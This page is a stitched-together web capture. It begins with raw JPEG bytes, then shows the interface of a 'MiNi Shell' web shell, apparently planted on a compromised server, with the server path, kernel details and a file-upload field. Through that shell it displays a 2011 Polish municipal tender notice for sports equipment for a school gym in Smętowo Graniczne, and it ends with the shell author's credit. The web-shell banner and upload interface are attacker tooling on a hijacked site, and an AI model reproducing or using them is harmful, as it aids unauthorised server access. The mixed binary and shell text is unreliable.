JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110202/37999-N-2011.html

<p class="kh_header"><b>Smętowo Graniczne: Dostawa i montaż wyposażenia do sali gimnastycznej, siłowni, szatni i pomieszczenia technicznego w ramach projektu (Budowa sali gimnastycznej z zapleczem i łącznikiem przy Publicznej Szkole Podstawowej w Kopytkowie wraz z wyposażeniem).</b><br>
<b>Numer ogłoszenia: 37999 - 2011; data zamieszczenia: 02.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Smętowo Graniczne , ul. Dworcowa 10, 83-230 Smętowo Graniczne, woj. pomorskie, tel. 058 5619033, faks 058 5619520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.smetowograniczne.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia do sali gimnastycznej, siłowni, szatni i pomieszczenia technicznego w ramach projektu (Budowa sali gimnastycznej z zapleczem i łącznikiem przy Publicznej Szkole Podstawowej w Kopytkowie wraz z wyposażeniem)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa i montaż wyposażenia do sali gimnastycznej, siłowni, szatni i pomieszczenia technicznego w ramach projektu (Budowa sali gimnastycznej z zapleczem i łącznikiem przy Publicznej Szkole Podstawowej w Kopytkowie) szczegółowo zestawionego w załącznikach 1, 2 i 3 do SIWZ. W zakres montażu wyposażenia do siatkówki centralnej, treningowej i drążka gimnastycznego wchodzi montaż całkowity słupków polegający na wykonaniu w ramach montażu fundamentów betonowych niezbędnych do właściwego montażu 2 słupków do siatkówki centralnej, 4 słupków do siatkówki treningowej oraz 2 słupków drążka gimnastycznego. W ramach montażu elektronicznej tablicy wyników wchodzi również wykonanie instalacji elektrycznej zasilającej tę tablicę. Wyposażenie musi posiadać atesty i certyfikaty zgodnie z § 9 ust.3 rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 31 grudnia 2002 r. w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach (Dz.U. z 2003 r. Nr 6, poz. 69 ze zm.).   
 Zakres:
1) W sali gimnastycznej należy zamontować urządzenia boiska koszykówki centralnej - 1 kpl., koszykówki treningowej - 1 kpl., piłki ręcznej - 1 kpl., siatkówki centralnej - 1 kpl., siatkówki treningowej - 1 kpl., piłkochwyty - 1kpl., tablica elektroniczna wyników - 1szt., stanowisko sędziego - 1szt., kotara grodząca - 1szt., drabiny gimnastyczne podwójne - 13 szt., drążek gimnastyczny przyścienny z odciągami i listwą naścienną - 1 szt., ławki gimnastyczne - 6 szt., równoważnia gimnastyczna niska 3m - 1 szt., skrzynia 5 częściowa - 1 szt., odskocznia gimnastyczna - 1 szt., konstrukcja lin do wspinania naścienna pojedyncza - 1 kpl., konstrukcja drabin do wspinania naścienna pojedyncza - 1 kpl., materace gimnastyczne - 10 szt. kozioł gimnastyczny - 1 szt., stół do tenisa - 1 szt., piłki do gier ogółem - 30 szt. Do pomieszczenia technicznego należy dostarczyć wózek na materace - 1 szt., regał magazynowy na sprzęt - 2 szt., wózek na piłki - 2 szt. 
Szczegółowe zestawienie w.w wyposażenia stanowi załącznik nr 1 do SIWZ.
WAŻNE! 
Do obowiązków Wykonawcy należy w ramach montażu dwóch słupków do bramek do siatkówki centralnej i czterech słupków do siatkówki treningowej oraz montażu dwóch słupków pod drążek gimnastyczny wykonanie fundamentów betonowych pod te słupki wraz z niezbędnymi umocowaniami.
Do obowiązków Wykonawcy w ramach montażu elektronicznej tablicy wyników należy wykonanie prac związanych z położeniem instalacji elektrycznej zasilającej tablicę.  
W kosztach wyposażenia należy uwzględnić koszt tablic informacyjnych określających zasady bezpiecznego użytkowania urządzeń i sprzętu sportowego, o których mowa w § 30 ust. 6 rozporządzenia MENiS z 31.12.2002 r. (Dz.U. z 2003 r. Nr 6, poz. 69 ze zm.), których dostarczenie należy do obowiązków Wykonawcy w ramach przedmiotu zamówienia.
2) Do siłowni należy dostarczyć sprzęt siłowy i aerobowy. 
Ze sprzętu siłowego: suwnica do nóg - 1 szt., wyciąg z góry i z dołu - 1 szt., maszyna na przywodziciele i odwodziciele - 1 szt., motylek - 1 szt., ławka skośna - 1 szt., stojaki wolnostojące - 1 kpl.,  ławka uniwersalna - 1 szt., sztanga standard L=220+zaciski - 1 kpl., sztanga L=1400 gięta+zaciski - 1kpl., sztanga L=1500 z tulejami - 1szt., hantelki ze stojakiem od 1 do 10 kg - 1 kpl., gryf i sztangietki za zmiennym  obciążeniem 20 kg - 2 szt., gryf i sztangietki za zmiennym obciążeniem 40 kg - 2 szt., krążki żeliwne 1,25-20kg - 3 kpl., stojak na talerze - 2 szt.  Ze sprzętu aerobowego: bieżnia - 1 szt., rowerek treningowy - 1 szt., crosstrainer - 1 szt., wioślarz - 1 szt.
Szczegółowe zestawienie w.w zamawianego wyposażenia stanowi załącznik nr 2 do SIWZ.
3) Do szatni należy dostarczyć szkolne metalowe szafki ubraniowe z ławką jednostronną - 18szt. Konstrukcja szafek zgrzewana, wykonana z blachy stalowej zabezpieczonej antykorozyjnie i lakierowanej ekologicznymi farbami proszkowymi. Wymiary gabarytowe wysokość1700 mm, szerokość 600mm, głębokość 400 mm. Ławki jednostronne pod szafkami wysokość 400 mm,  wykonane ze sklejki lakierowanej  #12 mm, głębokość siedziska 280mm. Wysokość całej konstrukcji 2100mm. 
Wyposażenie szafek: 2 komory o wymiarach 1515x245 mm, każda komora wyposażona w półkę górną o nośności 60 kg oraz w półkę dolną na obuwie o nośności 60 kg, w każdej komorze haczyki na odzież. Szafki wyposażone w daszek o wysokości 100mm,  wzmocnione drzwi oraz zawiasy, zamek cylindryczny z kompletem 2 kluczy, otwory wentylacyjne, regulatory pozwalające na poziomowanie. Szafki ustawione szeregowo 2x3 i 2x6 muszą być skręcone ze sobą. Wszystkie szafki muszą być przykotwione do ścian. 
Szczegółowe zestawienie w.w zamawianego wyposażenia stanowi załącznik nr 3 do SIWZ.
2. Przedmiot zamówienia ma być wykonany w oparciu o dokumentację przetargową.

3. Do wykonania zamówienia Wykonawcy zobowiązani są użyć materiałów i urządzeń nowych, w gatunku I, gwarantujących najwyższą jakość, o parametrach technicznych i jakościowych nie gorszych niż określone w dokumentacji przetargowej.  Występujące w dokumentacji nazwy, typy i pochodzenie produktów nie są dla Wykonawców wiążące.
Nazwy własne nie mają na celu naruszenia art. 29 i art. 7 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego.
Zamawiający informuje, że dopuszcza możliwość zastosowania równoważnych rozwiązań (np. materiałów, urządzeń) tzn. takich, których parametry techniczne są równoważne - co najmniej takie same (nie gorsze) od tych podanych w dokumentacji technicznej. Materiały równoważne muszą być w ofercie wymienione z nazwy a ciężar udowodnienia zachowania parametrów wymaganych przez Zamawiającego, w razie wątpliwości leży po stronie składającego ofertę. 
4. W razie stwierdzenia przez Wykonawcę, że dokumentacja przetargowa zawiera błędy lub braki winien on niezwłocznie powiadomić o tym fakcie Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.45.29.10-3, 39.29.00.00-1, 51.12.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli wykonawca przedstawi oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności przy realizacji zamówienia , wg załącznika nr 1 do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli wykonawca wykaże , (załącznik nr 3 do oferty), że zrealizował w ostatnich 3 latach przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 podobną dostawę z montażem sprzętu sportowego. Wykonawca winien wykazać, że te dostawy zostały wykonane należycie.W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli wykonawca przedstawi oświadczenie (wg załącznika nr 1 do oferty), że dysponuje potencjałem technicznym umożliwiającym wykonanie zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli wykonawca przedstawi oświadczenie (wg załącznika nr 1 do oferty),że znajduje się w sytuacji ekonomicznej i finansowej gwarantującej wykonanie zamówienia. 
W przypadku składania oferty przez Wykonawców występujących wspólnie, w/w warunek Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy wg wzoru do SIWZ, tabela cenowa wszystkich elementów wyposażenia będącego przedmiotem zamówienia w szczególności zgodnej z zestawieniami zawartymi w załącznikach nr 1, 2 i 3 do SIWZ, zaakceptowany wzór umowy (załącznik nr 4 do SIWZ), wskazanie części zamówienia (zakresu), których wykonanie zamierza powierzyć podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Warunki umowne określa wzór umowy, stanowiący załącznik nr 4 do SIWZ.
2. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w następujących przypadkach:
a) termin wykonania umowy może ulec zmianie w przypadku wystąpienia sytuacji niemożliwych do przewidzenia w chwili zawarcia umowy, jak np.:
- konieczności wykonania zamówień dodatkowych, uniemożliwiających wykonanie zamówienia podstawowego,
- z powodu nieprzewidzianego braku płynności finansowej u Zamawiającego,
- wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego,
- z powodu zmiany terminu wykonania robót budowlanych, których uprzednie zakończenie jest warunkiem koniecznym i niezbędnym do wykonania przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.smetowograniczne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Smętowie Granicznym 
ul. Dworcowa 10, 83-230 Smętowo Graniczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2011 godzina 11:00, miejsce: Urząd Gminy w Smętowie Granicznym 
ul. Dworcowa 10, 83-230 Smętowo Graniczne, sekretariat Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013,
Osi Priorytetowej 9. Lokalna infrastruktura społeczna i inicjatywy obywatelskie,
Działania 9.1. Lokalna infrastruktura edukacyjna, sportowa i kultury..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com